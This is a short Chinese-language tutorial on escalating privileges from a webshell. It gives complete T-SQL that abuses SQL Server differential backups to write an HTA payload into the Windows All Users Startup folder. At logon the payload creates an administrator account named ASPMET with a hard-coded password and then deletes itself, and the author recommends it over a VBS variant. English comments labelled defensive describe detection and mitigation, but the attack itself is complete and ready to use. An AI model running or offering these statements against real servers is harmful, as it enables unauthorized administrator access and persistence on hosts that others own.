Webshell提权之启动项备份hta文件

连接sql后全部代码如下:

-- Reviewer note (defensive): the five statements below abuse BACKUP DATABASE ... TO DISK
-- to write attacker-controlled bytes into an arbitrary file on the SQL Server host.
-- The SQL statements run with the rights of the connected login (CREATE TABLE,
-- BACKUP DATABASE), but the file itself is created by the SQL Server service
-- account, so the technique only works when that account can write to the target
-- folder. Least-privilege service accounts and not granting backup rights to
-- web-application logins remove the precondition.
create table [bin_cmd]([cmd] [image]);

-- Full backup of the current database to a file whose name is given as the hex
-- literal 0x62696E ('bin'). Its purpose here is to establish the base so the later
-- DIFFERENTIAL backup contains little more than the inserted row. Detection: a
-- BACKUP DATABASE ... TO DISK whose destination is a bare relative name or lies
-- outside the configured backup directory, issued from an application login.
declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;

-- The payload row: an HTA script that, when the file is executed, creates a local
-- user ASPMET, adds it to the local Administrators group, then deletes dllhost.hta
-- so the artifact disappears. On the endpoint this would presumably surface as
-- mshta.exe spawning cmd.exe running "net user ... /add" and
-- "net localgroup administrators ... /add" -- a high-fidelity detection pair.
insert into [bin_cmd](cmd)values('<scrIpt language=VBScript>window.moveTo 8888,8888:Set s=CreateObject("Wscript.Shell"):s.Run "cmd.exe /c net user ASPMET 123_asda!@ /add",0:s.Run "cmd.exe /c net localgroup administrators ASPMET /add & del dllhost.hta",0:window.resizeTo 0,0:window.close</script>');

-- Differential backup written straight into the All Users Startup folder under a
-- .hta name; the page reports the resulting file runs at the next logon despite
-- the surrounding backup binary. Mitigation/detection: deny the SQL Server service
-- account write access to Startup folders, and alert on file creation by
-- sqlservr.exe in Startup folders or with script extensions (.hta/.vbs/.js).
declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='C:\Documents and Settings\All Users\「开始」菜单\程序\启动\dllhost.hta' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;

-- Cleanup of the staging table only. Note for forensics: the base backup file
-- "bin" written by the first BACKUP statement is not removed and remains on disk
-- as an artifact of the activity.
drop table [bin_cmd];


运行后会删除自身,并且添加一个用户名ASPMET,密码为123_asda!@的管理员组账户,比vbs那个好些
